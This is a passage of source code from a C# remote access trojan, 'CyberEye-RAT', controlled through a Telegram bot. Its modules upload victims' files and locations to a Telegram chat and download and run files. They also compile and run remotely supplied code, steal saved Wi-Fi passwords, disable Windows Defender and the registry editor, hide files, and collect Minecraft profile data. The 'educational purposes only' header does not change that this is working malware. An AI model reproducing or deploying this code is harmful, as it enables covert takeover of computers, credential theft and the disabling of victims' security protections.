HttpClient()) 140 | { 141 | MultipartFormDataContent fform = new MultipartFormDataContent(); 142 | var file_bytes = File.ReadAllBytes(file); 143 | fform.Add(new ByteArrayContent(file_bytes, 0, file_bytes.Length), type.ToLower(), file); 144 | var rresponse = httpClient.PostAsync( 145 | "https://api.telegram.org/bot" + 146 | config.TelegramToken + 147 | "/send" + type + 148 | "?chat_id=" + config.TelegramChatID, 149 | fform 150 | ); 151 | rresponse.Wait(); 152 | httpClient.Dispose(); 153 | } 154 | } 155 | 156 | // Send text 157 | public static void sendText(string text, string chatID = config.TelegramChatID) 158 | { 159 | waitForUnblock(); 160 | using (WebClient client = new WebClient()) 161 | { 162 | client.DownloadString( 163 | "https://api.telegram.org/bot" + 164 | config.TelegramToken + 165 | "/sendMessage" + 166 | "?chat_id=" + chatID + 167 | "&text=" + text 168 | ); 169 | } 170 | } 171 | 172 | // Send image 173 | public static void sendImage(string file) 174 | { 175 | sendFile(file, "Photo"); 176 | } 177 | 178 | // Send voice 179 | public static void sendVoice(string file) 180 | { 181 | sendFile(file, "Voice"); 182 | } 183 | 184 | // Send location 185 | public static void sendLocation(float lat, float lon) 186 | { 187 | waitForUnblock(); 188 | using (WebClient client = new WebClient()) 189 | { 190 | client.DownloadString( 191 | "https://api.telegram.org/bot" + 192 | config.TelegramToken + 193 | "/sendLocation" + 194 | "?chat_id=" + config.TelegramChatID + 195 | "&latitude=" + lat + 196 | "&longitude=" + lon 197 | ); 198 | } 199 | } 200 | // Send file from chat/url to computer 201 | public static void DownloadFile(string file, string path = "") 202 | { 203 | waitForUnblock(); 204 | // Download file from url 205 | if (file.StartsWith("http")) 206 | { 207 | sendText($"📄 Downloading file \"{Path.GetFileName(file)}\" from url"); 208 | try 209 | { 210 | using (WebClient client = new WebClient()) 211 | client.DownloadFile(new Uri(file), Path.GetFileName(file)); 212 | } catch 213 | { 214 | sendText(String.Format("💥 Connection error")); 215 | return; 216 | } 217 | 218 | sendText($"💾 File \"{file}\" saved in: \"{Path.GetFullPath(Path.GetFileName(file))}\""); 219 | // Download file from chat 220 | } else 221 | { 222 | sendText("📄 Downloading file: \"{file}\""); 223 | path = @"https://api.telegram.org/file/bot" + config.TelegramToken + "/" + path; 224 | using (WebClient client = new WebClient()) 225 | client.DownloadFile(new Uri(path), file); 226 | sendText("💾 File \"{file}\" saved in: \"{Path.GetFullPath(file)}\""); 227 | } 228 | } 229 | 230 | // Send file from computer to chat 231 | public static void UploadFile(string file, bool removeAfterUpload = false) 232 | { 233 | waitForUnblock(); 234 | // If is file 235 | if (File.Exists(file)) 236 | { 237 | sendText("📃 Uploading file..."); 238 | sendFile(file); 239 | // Remove after uploading 240 | if(removeAfterUpload) 241 | { 242 | File.Delete(file); 243 | } 244 | } 245 | // If is directory 246 | else if(Directory.Exists(file)) 247 | { 248 | sendText("📁 Uploading directory..."); 249 | string zfile = file + ".zip"; 250 | if(File.Exists(zfile)) 251 | { File.Delete(zfile); } 252 | // Add dir to archive 253 | System.IO.Compression.ZipFile.CreateFromDirectory(file, zfile); 254 | // Send archive 255 | sendFile(zfile); 256 | // Delete archive 257 | File.Delete(zfile); 258 | // If path not exists 259 | } 260 | else 261 | { 262 | sendText("⛔ File not found!"); 263 | return; 264 | } 265 | } 266 | 267 | // Send connected 268 | public static void sendConnection() 269 | { 270 | sendText("👁 CyberEye connected"); 271 | } 272 | 273 | 274 | } 275 | } 276 | -------------------------------------------------------------------------------- /TelegramRAT/modded/Fun/Beep.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : Cisamu 3 | ^ Name : CyberEye-RAT 4 | ^ Github : https://github.com/cisamu123 5 | > This program is distributed for educational purposes only. 6 | */ 7 | using System; 8 | 9 | namespace TelegramRAT.modded 10 | { 11 | internal sealed class Beep 12 | { 13 | public static void PlayBeep(int frequencyHz, int durationMs) 14 | { 15 | try 16 | { 17 | if (frequencyHz > 37 && frequencyHz < 32767) 18 | { 19 | Console.Beep(frequencyHz, durationMs); 20 | } 21 | else 22 | { 23 | telegram.sendText("❌ Invalid frequency. Frequency must be between 37 and 32767 Hz."); 24 | } 25 | } 26 | catch (Exception ex) 27 | { 28 | telegram.sendText($"❌ Error: {ex.Message}"); 29 | } 30 | } 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /TelegramRAT/modded/Fun/CustomMsgBox.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : Cisamu 3 | ^ Name : CyberEye-RAT 4 | ^ Github : https://github.com/cisamu123 5 | > This program is distributed for educational purposes only. 6 | ! WARNING ! This function will work in the next version of the RAT. 7 | */ 8 | /* 9 | using System.Windows.Forms; 10 | namespace TelegramRAT.modded 11 | { 12 | internal sealed class CustomMsgBox 13 | { 14 | // All data must be in base64 format, for example, the message title and other details. Additionally, the size of the message box should be larger than the image. 15 | // Converting from base64 to text. 16 | // The sound should be in WAV file format. You can convert it to this file type using the website https://audio.online-convert.com/convert-to-wav. 17 | public static void CustomMessageBox(string message, string title, int x, int y, int width, int height, bool isUserWantsImage, string photoLink, System.Drawing.Color backgroundColor) 18 | { 19 | Form form = new Form(); 20 | form.Text = title; 21 | form.StartPosition = FormStartPosition.Manual; 22 | form.Location = new System.Drawing.Point(x, y); 23 | form.Size = new System.Drawing.Size(width, height); 24 | 25 | if (isUserWantsImage) 26 | { 27 | PictureBox pictureBox = new PictureBox(); 28 | pictureBox.ImageLocation = photoLink; 29 | pictureBox.SizeMode = PictureBoxSizeMode.StretchImage; 30 | pictureBox.Dock = DockStyle.Fill; 31 | 32 | form.Controls.Add(pictureBox); 33 | } 34 | else 35 | { 36 | form.BackColor = backgroundColor; 37 | } 38 | 39 | Label label = new Label(); 40 | label.Text = message; 41 | label.AutoSize = true; 42 | label.Location = new System.Drawing.Point(10, 10); 43 | 44 | Button button = new Button(); 45 | button.Text = "OK"; 46 | button.Location = new System.Drawing.Point(10, 40); 47 | button.Click += (sender, e) => 48 | { 49 | form.Close(); 50 | }; 51 | 52 | form.Controls.Add(label); 53 | form.Controls.Add(button); 54 | 55 | Application.Run(form); 56 | } 57 | } 58 | } 59 | */ -------------------------------------------------------------------------------- /TelegramRAT/modded/Fun/Cycle.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : Cisamu 3 | ^ Name : CyberEye-RAT 4 | ^ Github : https://github.com/cisamu123 5 | > This program is distributed for educational purposes only. 6 | */ 7 | 8 | using System; 9 | using System.Diagnostics; 10 | 11 | namespace TelegramRAT.modded 12 | { 13 | internal sealed class Cycle 14 | { 15 | public static void CycleStart(string target_object, int durationMs) 16 | { 17 | target_object = utils.Base64Decode(target_object); 18 | DateTime startTime = DateTime.Now; 19 | while ((DateTime.Now - startTime).TotalMilliseconds < durationMs) { Process.Start(target_object); } 20 | } 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /TelegramRAT/modded/Fun/SetRandomCurPos.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : Cisamu 3 | ^ Name : CyberEye-RAT 4 | ^ Github : https://github.com/cisamu123 5 | > This program is distributed for educational purposes only. 6 | */ 7 | 8 | using System; 9 | using System.Drawing; 10 | using System.Runtime.InteropServices; 11 | using System.Threading; 12 | using System.Windows.Forms; 13 | 14 | namespace TelegramRAT.modded 15 | { 16 | internal sealed class SetRandomCurPos 17 | { 18 | [DllImport("user32.dll")] 19 | private static extern bool SetCursorPos(int X, int Y); 20 | public static void Set(int durationMs) 21 | { 22 | Random random = new Random(); 23 | 24 | Point currentPosition = Cursor.Position; 25 | 26 | Rectangle screenBounds = Screen.PrimaryScreen.Bounds; 27 | 28 | DateTime startTime = DateTime.Now; 29 | 30 | while ((DateTime.Now - startTime).TotalMilliseconds < durationMs) 31 | { 32 | int randomX = random.Next(screenBounds.Left, screenBounds.Right); 33 | int randomY = random.Next(screenBounds.Top, screenBounds.Bottom); 34 | 35 | SetCursorPos(randomX, randomY); 36 | 37 | Thread.Sleep(100); 38 | } 39 | 40 | SetCursorPos(currentPosition.X, currentPosition.Y); 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /TelegramRAT/modded/Sys/Compiler.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : Cisamu 3 | ^ Name : CyberEye-RAT 4 | ^ Github : https://github.com/cisamu123 5 | > This program is distributed for educational purposes only. 6 | */ 7 | 8 | using System; 9 | using System.CodeDom.Compiler; 10 | using System.Diagnostics; 11 | using System.IO; 12 | using Microsoft.CSharp; 13 | using Microsoft.VisualBasic; 14 | 15 | namespace TelegramRAT.modded 16 | { 17 | internal class Compiler 18 | { 19 | //public static Random rand = new Random(); 20 | //public static string difnum = rand.Next(0, 999999999).ToString(); 21 | public static void CompileCsharp(string code) 22 | { 23 | code = utils.Base64Decode(code); 24 | CSharpCodeProvider provider = new CSharpCodeProvider(); 25 | CompilerParameters parameters = new CompilerParameters 26 | { 27 | GenerateExecutable = true, 28 | OutputAssembly = Path.GetTempPath() + "outputcs.exe" 29 | }; 30 | 31 | CompilerResults results = provider.CompileAssemblyFromSource(parameters, code); 32 | 33 | if (results.Errors.HasErrors) 34 | { 35 | telegram.sendText("❌ Compilation failed! code must be in base64, u can encode this in https://www.base64encode.org/"); 36 | foreach (CompilerError error in results.Errors) 37 | { 38 | telegram.sendText(error.ErrorText); 39 | } 40 | } 41 | else 42 | { 43 | telegram.sendText("✅ Compilation successful! Executable created."); 44 | Process.Start(Path.GetTempPath() + "outputcs.exe"); 45 | } 46 | } 47 | public static void CompileVbNet(string code) 48 | { 49 | code = utils.Base64Decode(code); 50 | VBCodeProvider provider = new VBCodeProvider(); 51 | CompilerParameters parameters = new CompilerParameters 52 | { 53 | GenerateExecutable = true, 54 | OutputAssembly = Path.GetTempPath() + "outputvb.exe" 55 | }; 56 | 57 | CompilerResults results = provider.CompileAssemblyFromSource(parameters, code); 58 | 59 | if (results.Errors.HasErrors) 60 | { 61 | telegram.sendText("❌ Compilation failed! code must be in base64, u can encode this in https://www.base64encode.org/"); 62 | foreach (CompilerError error in results.Errors) 63 | { 64 | telegram.sendText(error.ErrorText); 65 | } 66 | } 67 | else 68 | { 69 | telegram.sendText("✅ Compilation successful! Executable created."); 70 | Process.Start(Path.GetTempPath() + "outputvb.exe"); 71 | } 72 | } 73 | } 74 | } 75 | -------------------------------------------------------------------------------- /TelegramRAT/modded/Sys/HideOrUnhideDir.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : Cisamu 3 | ^ Name : CyberEye-RAT 4 | ^ Github : https://github.com/cisamu123 5 | > This program is distributed for educational purposes only. 6 | */ 7 | 8 | using System; 9 | using System.IO; 10 | 11 | namespace TelegramRAT.modded 12 | { 13 | internal sealed class HideOrUnhideDir 14 | { 15 | public static void HideFileOrDirectory(string path) 16 | { 17 | path = utils.Base64Decode(path); 18 | try 19 | { 20 | if (File.Exists(path)) 21 | { 22 | File.SetAttributes(path, File.GetAttributes(path) | FileAttributes.Hidden); 23 | telegram.sendText("✅ File hidden successfully."); 24 | } 25 | else if (Directory.Exists(path)) 26 | { 27 | DirectoryInfo directoryInfo = new DirectoryInfo(path); 28 | directoryInfo.Attributes |= FileAttributes.Hidden; 29 | telegram.sendText("✅ Directory hidden successfully."); 30 | } 31 | else 32 | { 33 | telegram.sendText("❌ File or directory does not exist."); 34 | } 35 | } 36 | catch (Exception ex) 37 | { 38 | telegram.sendText("❌ Error hiding file or directory: " + ex.Message); 39 | } 40 | } 41 | 42 | public static void UnhideFileOrDirectory(string path) 43 | { 44 | path = utils.Base64Decode(path); 45 | try 46 | { 47 | if (File.Exists(path)) 48 | { 49 | File.SetAttributes(path, File.GetAttributes(path) & ~FileAttributes.Hidden); 50 | telegram.sendText("✅ File unhidden successfully."); 51 | } 52 | else if (Directory.Exists(path)) 53 | { 54 | DirectoryInfo directoryInfo = new DirectoryInfo(path); 55 | directoryInfo.Attributes &= ~FileAttributes.Hidden; 56 | telegram.sendText("✅ Directory unhidden successfully."); 57 | } 58 | else 59 | { 60 | telegram.sendText("❌ File or directory does not exist."); 61 | } 62 | } 63 | catch (Exception ex) 64 | { 65 | telegram.sendText("❌ Error unhiding file or directory: " + ex.Message); 66 | } 67 | } 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /TelegramRAT/modded/Sys/Regedit.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : Cisamu 3 | ^ Name : CyberEye-RAT 4 | ^ Github : https://github.com/cisamu123 5 | > This program is distributed for educational purposes only. 6 | */ 7 | 8 | using Microsoft.Win32; 9 | using System; 10 | 11 | namespace TelegramRAT.modded 12 | { 13 | internal sealed class Regedit 14 | { 15 | public static void DisableRegedit() 16 | { 17 | try 18 | { 19 | RegistryKey regKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", true); 20 | 21 | if (regKey == null) 22 | regKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"); 23 | 24 | regKey.SetValue("DisableRegistryTools", 1, RegistryValueKind.DWord); 25 | regKey.Close(); 26 | 27 | telegram.sendText("✅Regedit disabled successfully."); 28 | } 29 | catch (Exception ex) 30 | { 31 | telegram.sendText("❌ Error disabling Regedit: " + ex.Message); 32 | } 33 | } 34 | 35 | public static void EnableRegedit() 36 | { 37 | try 38 | { 39 | RegistryKey regKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", true); 40 | 41 | if (regKey != null) 42 | { 43 | regKey.DeleteValue("DisableRegistryTools", false); 44 | regKey.Close(); 45 | } 46 | 47 | telegram.sendText("✅ Regedit enabled successfully."); 48 | } 49 | catch (Exception ex) 50 | { 51 | telegram.sendText("❌ Error enabling Regedit: " + ex.Message); 52 | } 53 | } 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /TelegramRAT/modded/Sys/Wifi_Steal.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : Cisamu 3 | ^ Name : CyberEye-RAT 4 | ^ Github : https://github.com/cisamu123 5 | > This program is distributed for educational purposes only. 6 | */ 7 | 8 | using System; 9 | using System.Diagnostics; 10 | using System.IO; 11 | using System.Xml; 12 | 13 | namespace TelegramRAT.modded 14 | { 15 | internal sealed class Wifi_Steal 16 | { 17 | public static string[] fileNames; 18 | public static int count = 1; 19 | 20 | public static void Steal(string folderPath) 21 | { 22 | folderPath = utils.Base64Decode(folderPath); 23 | if (!System.IO.Directory.Exists(folderPath)) 24 | { 25 | System.IO.Directory.CreateDirectory(folderPath); 26 | } 27 | 28 | Process process = new Process(); 29 | 30 | ProcessStartInfo startInfo = new ProcessStartInfo(); 31 | startInfo.FileName = "netsh"; 32 | startInfo.Arguments = $"wlan export profile key=clear folder=\"{folderPath}\""; 33 | startInfo.RedirectStandardOutput = true; 34 | startInfo.UseShellExecute = false; 35 | startInfo.CreateNoWindow = true; 36 | 37 | process.StartInfo = startInfo; 38 | 39 | process.Start(); 40 | 41 | string output = process.StandardOutput.ReadToEnd(); 42 | 43 | process.WaitForExit(); 44 | 45 | fileNames = Directory.GetFiles(folderPath); 46 | 47 | foreach (string fileName in fileNames) 48 | { 49 | telegram.sendFile(fileName); 50 | string name = string.Empty; 51 | string keyMaterial = string.Empty; 52 | 53 | GetNameAndKeyMaterialFromFile(fileName, out name, out keyMaterial); 54 | string message = $"ℹ️ File {count}: WiFi Name: {name}, WiFi Password: {keyMaterial}"; 55 | 56 | telegram.sendText(message); 57 | 58 | count++; 59 | } 60 | Directory.Delete(folderPath, true); 61 | } 62 | 63 | public static void GetNameAndKeyMaterialFromFile(string filePath, out string name, out string keyMaterial) 64 | { 65 | name = string.Empty; 66 | keyMaterial = string.Empty; 67 | 68 | try 69 | { 70 | XmlDocument xmlDoc = new XmlDocument(); 71 | xmlDoc.Load(filePath); 72 | 73 | XmlNamespaceManager nsManager = new XmlNamespaceManager(xmlDoc.NameTable); 74 | nsManager.AddNamespace("ns", "http://www.microsoft.com/networking/WLAN/profile/v1"); 75 | 76 | XmlNode nameNode = xmlDoc.SelectSingleNode("/ns:WLANProfile/ns:SSIDConfig/ns:SSID/ns:name", nsManager); 77 | XmlNode keyMaterialNode = xmlDoc.SelectSingleNode("/ns:WLANProfile/ns:MSM/ns:security/ns:sharedKey/ns:keyMaterial", nsManager); 78 | 79 | if (nameNode != null) 80 | { 81 | name = nameNode.InnerText; 82 | } 83 | else 84 | { 85 | telegram.sendText("❌ WiFi Name node not found."); 86 | } 87 | 88 | if (keyMaterialNode != null) 89 | { 90 | keyMaterial = keyMaterialNode.InnerText; 91 | } 92 | else 93 | { 94 | telegram.sendText("❌ WiFi KeyMaterial (Password) node not found."); 95 | } 96 | } 97 | catch (Exception ex) 98 | { 99 | telegram.sendText($"❌ Error while retrieving name and keyMaterial: {ex}"); 100 | } 101 | } 102 | } 103 | } 104 | -------------------------------------------------------------------------------- /TelegramRAT/modded/Sys/WinDefend.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : Cisamu 3 | ^ Name : CyberEye-RAT 4 | ^ Github : https://github.com/cisamu123 5 | > This program is distributed for educational purposes only. 6 | */ 7 | 8 | using Microsoft.Win32; 9 | using System.Diagnostics; 10 | 11 | namespace TelegramRAT.modded 12 | { 13 | internal class WinDefend 14 | { 15 | public static void Disable() 16 | { 17 | if (!utils.IsAdministrator()) 18 | return; 19 | 20 | DisableDefenderFeatures(); 21 | 22 | CheckDefenderSettings(); 23 | } 24 | public static void Enable() 25 | { 26 | if (!utils.IsAdministrator()) 27 | return; 28 | 29 | EnableDefenderFeatures(); 30 | 31 | CheckDefenderSettings(); 32 | } 33 | 34 | private static void EnableDefenderFeatures() 35 | { 36 | RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "1"); 37 | RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "0"); 38 | RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "0"); 39 | RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "0"); 40 | RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "0"); 41 | } 42 | 43 | private static void DisableDefenderFeatures() 44 | { 45 | RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); 46 | RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1"); 47 | RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1"); 48 | RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1"); 49 | RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1"); 50 | } 51 | 52 | private static void CheckDefenderSettings() 53 | { 54 | Process proc = new Process 55 | { 56 | StartInfo = new ProcessStartInfo 57 | { 58 | FileName = "powershell", 59 | Arguments = "Get-MpPreference -verbose", 60 | UseShellExecute = false, 61 | RedirectStandardOutput = true, 62 | WindowStyle = ProcessWindowStyle.Hidden, 63 | CreateNoWindow = true 64 | } 65 | }; 66 | proc.Start(); 67 | while (!proc.StandardOutput.EndOfStream) 68 | { 69 | string line = proc.StandardOutput.ReadLine(); 70 | 71 | if (line.StartsWith(@"DisableRealtimeMonitoring") && line.EndsWith("False")) 72 | RunPS("Set-MpPreference -DisableRealtimeMonitoring $true"); //real-time protection 73 | 74 | else if (line.StartsWith(@"DisableBehaviorMonitoring") && line.EndsWith("False")) 75 | RunPS("Set-MpPreference -DisableBehaviorMonitoring $true"); //behavior monitoring 76 | 77 | else if (line.StartsWith(@"DisableBlockAtFirstSeen") && line.EndsWith("False")) 78 | RunPS("Set-MpPreference -DisableBlockAtFirstSeen $true"); 79 | 80 | else if (line.StartsWith(@"DisableIOAVProtection") && line.EndsWith("False")) 81 | RunPS("Set-MpPreference -DisableIOAVProtection $true"); //scans all downloaded files and attachments 82 | 83 | else if (line.StartsWith(@"DisablePrivacyMode") && line.EndsWith("False")) 84 | RunPS("Set-MpPreference -DisablePrivacyMode $true"); //displaying threat history 85 | 86 | else if (line.StartsWith(@"SignatureDisableUpdateOnStartupWithoutEngine") && line.EndsWith("False")) 87 | RunPS("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"); //definition updates on startup 88 | 89 | else if (line.StartsWith(@"DisableArchiveScanning") && line.EndsWith("False")) 90 | RunPS("Set-MpPreference -DisableArchiveScanning $true"); //scan archive files, such as .zip and .cab files 91 | 92 | else if (line.StartsWith(@"DisableIntrusionPreventionSystem") && line.EndsWith("False")) 93 | RunPS("Set-MpPreference -DisableIntrusionPreventionSystem $true"); // network protection 94 | 95 | else if (line.StartsWith(@"DisableScriptScanning") && line.EndsWith("False")) 96 | RunPS("Set-MpPreference -DisableScriptScanning $true"); //scanning of scripts during scans 97 | 98 | else if (line.StartsWith(@"SubmitSamplesConsent") && !line.EndsWith("2")) 99 | RunPS("Set-MpPreference -SubmitSamplesConsent 2"); //MAPSReporting 100 | 101 | else if (line.StartsWith(@"MAPSReporting") && !line.EndsWith("0")) 102 | RunPS("Set-MpPreference -MAPSReporting 0"); //MAPSReporting 103 | 104 | else if (line.StartsWith(@"HighThreatDefaultAction") && !line.EndsWith("6")) 105 | RunPS("Set-MpPreference -HighThreatDefaultAction 6 -Force"); // high level threat // Allow 106 | 107 | else if (line.StartsWith(@"ModerateThreatDefaultAction") && !line.EndsWith("6")) 108 | RunPS("Set-MpPreference -ModerateThreatDefaultAction 6"); // moderate level threat 109 | 110 | else if (line.StartsWith(@"LowThreatDefaultAction") && !line.EndsWith("6")) 111 | RunPS("Set-MpPreference -LowThreatDefaultAction 6"); // low level threat 112 | 113 | else if (line.StartsWith(@"SevereThreatDefaultAction") && !line.EndsWith("6")) 114 | RunPS("Set-MpPreference -SevereThreatDefaultAction 6"); // severe level threat 115 | } 116 | } 117 | 118 | private static void RegistryEdit(string regPath, string name, string value) 119 | { 120 | try 121 | { 122 | using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree)) 123 | { 124 | if (key == null) 125 | { 126 | Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord); 127 | return; 128 | } 129 | if (key.GetValue(name) != (object)value) 130 | key.SetValue(name, value, RegistryValueKind.DWord); 131 | } 132 | } 133 | catch { } 134 | } 135 | 136 | private static void RunPS(string args) 137 | { 138 | Process proc = new Process 139 | { 140 | StartInfo = new ProcessStartInfo 141 | { 142 | FileName = "powershell", 143 | Arguments = args, 144 | WindowStyle = ProcessWindowStyle.Hidden, 145 | CreateNoWindow = true 146 | } 147 | }; 148 | proc.Start(); 149 | } 150 | } 151 | } 152 | -------------------------------------------------------------------------------- /TelegramRAT/modded/stealer/Minecraft.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : Cisamu 3 | ^ Name : CyberEye-RAT 4 | ^ Github : https://github.com/cisamu123 5 | > This program is distributed for educational purposes only. 6 | */ 7 | 8 | using System; 9 | using System.IO; 10 | using System.IO.Compression; 11 | using System.Linq; 12 | 13 | namespace TelegramRAT.modded.stealer 14 | { 15 | internal class Minecraft 16 | { 17 | private static readonly string MinecraftPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), ".minecraft"); 18 | 19 | // Get installed versions 20 | private static void SaveVersions(string sSavePath) 21 | { 22 | try 23 | { 24 | foreach (var version in Directory.GetDirectories(Path.Combine(MinecraftPath, "versions"))) 25 | { 26 | var name = new DirectoryInfo(version).Name; 27 | var size = DirectorySize(version) + " bytes"; 28 | var date = Directory.GetCreationTime(version) 29 | .ToString("yyyy-MM-dd h:mm:ss tt"); 30 | 31 | File.AppendAllText(sSavePath + "\\versions.txt", 32 | $"VERSION: {name}\n\tSIZE: {size}\n\tDATE: {date}\n\n"); 33 | } 34 | } 35 | catch (Exception ex) 36 | { 37 | telegram.sendText("Minecraft >> Failed collect installed versions\n" + ex); 38 | } 39 | } 40 | 41 | // Get installed mods 42 | private static void SaveMods(string sSavePath) 43 | { 44 | try 45 | { 46 | foreach (var mod in Directory.GetFiles(Path.Combine(MinecraftPath, "mods"))) 47 | { 48 | var name = Path.GetFileName(mod); 49 | var size = new FileInfo(mod).Length + " bytes"; 50 | var date = File.GetCreationTime(mod) 51 | .ToString("yyyy-MM-dd h:mm:ss tt"); 52 | 53 | File.AppendAllText(sSavePath + "\\mods.txt", $"MOD: {name}\n\tSIZE: {size}\n\tDATE: {date}\n\n"); 54 | } 55 | } 56 | catch (Exception ex) 57 | { 58 | telegram.sendText("Minecraft >> Failed collect installed mods\n" + ex); 59 | } 60 | } 61 | 62 | // Get screenshots 63 | private static void SaveScreenshots(string sSavePath) 64 | { 65 | try 66 | { 67 | var screenshots = Directory.GetFiles(Path.Combine(MinecraftPath, "screenshots")); 68 | if (screenshots.Length == 0) return; 69 | 70 | Directory.CreateDirectory(sSavePath + "\\screenshots"); 71 | foreach (var screenshot in screenshots) 72 | File.Copy(screenshot, sSavePath + "\\screenshots\\" + Path.GetFileName(screenshot)); 73 | } 74 | catch (Exception ex) 75 | { 76 | telegram.sendText("Minecraft >> Failed collect screenshots\n" + ex); 77 | } 78 | } 79 | 80 | // Get profile & options & servers files 81 | private static void SaveFiles(string sSavePath) 82 | { 83 | try 84 | { 85 | var files = Directory.GetFiles(MinecraftPath); 86 | foreach (var file in files) 87 | { 88 | var fileInfo = new FileInfo(file); 89 | var sFile = fileInfo.Name.ToLower(); 90 | if (sFile.Contains("profile") || sFile.Contains("options") || sFile.Contains("servers")) 91 | fileInfo.CopyTo(Path.Combine(sSavePath, fileInfo.Name)); 92 | } 93 | } 94 | catch (Exception ex) 95 | { 96 | telegram.sendText("Minecraft >> Failed collect profiles\n" + ex); 97 | } 98 | } 99 | 100 | // Get logs 101 | private static void SaveLogs(string sSavePath) 102 | { 103 | try 104 | { 105 | var logdir = Path.Combine(MinecraftPath, "logs"); 106 | var savedir = Path.Combine(sSavePath, "logs"); 107 | if (!Directory.Exists(logdir)) return; 108 | Directory.CreateDirectory(savedir); 109 | var files = Directory.GetFiles(logdir); 110 | foreach (var file in files) 111 | { 112 | var fileInfo = new FileInfo(file); 113 | if (fileInfo.Length >= config.GrabFileSize) continue; 114 | var to = Path.Combine(savedir, fileInfo.Name); 115 | if (!File.Exists(to)) 116 | fileInfo.CopyTo(to); 117 | } 118 | } 119 | catch (Exception ex) 120 | { 121 | telegram.sendText("Minecraft >> Failed collect logs\n" + ex); 122 | } 123 | } 124 | public static long DirectorySize(string path) 125 | { 126 | var dir = new DirectoryInfo(path); 127 | return dir.GetFiles().Sum(fi => fi.Length) + 128 | dir.GetDirectories().Sum(di => DirectorySize(di.FullName)); 129 | } 130 | // Run minecraft data stealer 131 | public static void SaveAll(bool SaveScreenshotsB, bool CleanFolderAfterCollectingB) 132 | { 133 | string dirPath = Path.GetDirectoryName(config.InstallPath) + "\\Minecraft"; 134 | if (!Directory.Exists(MinecraftPath)) return; 135 | 136 | try 137 | { 138 | Directory.CreateDirectory(dirPath); 139 | SaveMods(dirPath); 140 | SaveFiles(dirPath); 141 | SaveVersions(dirPath); 142 | SaveLogs(dirPath); 143 | if (SaveScreenshotsB) 144 | SaveScreenshots(dirPath); 145 | if (Directory.Exists(dirPath + ".zip")) 146 | File.Delete(dirPath + ".zip"); 147 | ZipFile.CreateFromDirectory(dirPath, dirPath + ".zip"); 148 | telegram.sendFile(dirPath + ".zip"); 149 | if (CleanFolderAfterCollectingB) 150 | { 151 | File.Delete(dirPath + ".zip"); 152 | Directory.Delete(dirPath, true); 153 | } 154 | } 155 | catch (Exception ex) 156 | { 157 | telegram.sendText("Minecraft >> Failed collect data\n" + ex); 158 | } 159 | } 160 | } 161 | } 162 | -------------------------------------------------------------------------------- /images/Builder.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/Builder.jpg -------------------------------------------------------------------------------- /images/BuilderBuild.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/BuilderBuild.jpg -------------------------------------------------------------------------------- /images/DownloadAndUnzipBuilder.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/DownloadAndUnzipBuilder.jpg -------------------------------------------------------------------------------- /images/ExecuteBuilder.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/ExecuteBuilder.jpg -------------------------------------------------------------------------------- /images/build.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/build.JPG -------------------------------------------------------------------------------- /images/chatidBot.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/chatidBot.JPG -------------------------------------------------------------------------------- /images/createBot.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/createBot.JPG -------------------------------------------------------------------------------- /images/loadSourceCode.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/loadSourceCode.JPG 